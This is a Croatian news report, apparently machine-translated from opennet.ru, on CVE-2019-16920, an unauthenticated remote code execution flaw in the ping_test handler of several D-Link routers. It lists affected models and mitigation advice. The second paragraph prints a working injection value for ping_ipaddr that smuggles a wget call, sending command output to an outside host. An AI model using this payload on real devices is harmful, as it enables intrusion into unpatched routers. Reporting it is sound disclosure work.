Ranjivost koja se može daljinski iskoristiti u D-Link usmjerivačima

U D-Link bežičnim usmjerivačima identificiran opasna ranjivost (CVE-2019-16920), koji vam omogućuje daljinsko izvršavanje koda na strani uređaja slanjem posebnog zahtjeva rukovatelju "ping_test", kojemu se može pristupiti bez autentifikacije.

Zanimljivo, prema programerima firmvera, poziv "ping_test" trebao bi se izvršiti tek nakon provjere autentičnosti, ali u stvarnosti se poziva u svakom slučaju, bez obzira na prijavu na web sučelje. Konkretno, prilikom pristupanja skripti apply_sec.cgi i prosljeđivanju parametra “action=ping_test”, skripta preusmjerava na stranicu za provjeru autentičnosti, ali u isto vrijeme izvodi radnju povezanu s ping_testom. Za izvršenje koda korištena je još jedna ranjivost u samom ping_testu, koja poziva uslužni program ping bez propisne provjere ispravnosti IP adrese poslane na testiranje. Na primjer, da biste pozvali uslužni program wget i prenijeli rezultate naredbe “echo 1234” na vanjski host, samo navedite parametar “ping_ipaddr=127.0.0.1%0awget%20-P%20/tmp/%20http:// test.test/?$( echo 1234)".

Ranjivost koja se može daljinski iskoristiti u D-Link usmjerivačima

Prisutnost ranjivosti službeno je potvrđena u sljedećim modelima:

  • DIR-655 s firmwareom 3.02b05 ili starijim;
  • DIR-866L s firmwareom 1.03b04 ili starijim;
  • DIR-1565 s firmwareom 1.01 ili starijim;
  • DIR-652 (nisu navedene informacije o problematičnim verzijama firmvera)

Razdoblje podrške za ove modele je već isteklo, pa D-Link on je naveo, koji za njih neće izdati ažuriranja za uklanjanje ranjivosti, ne preporuča njihovu upotrebu i savjetuje njihovu zamjenu novim uređajima. Kao sigurnosno rješenje, možete ograničiti pristup web sučelju samo na pouzdane IP adrese.

Kasnije je otkriveno da je i ranjivost utječe modeli DIR-855L, DAP-1533, DIR-862L, DIR-615, DIR-835 i DIR-825, planovi za izdavanje ažuriranja za koje još nisu poznati.

Izvor: opennet.ru

Dodajte komentar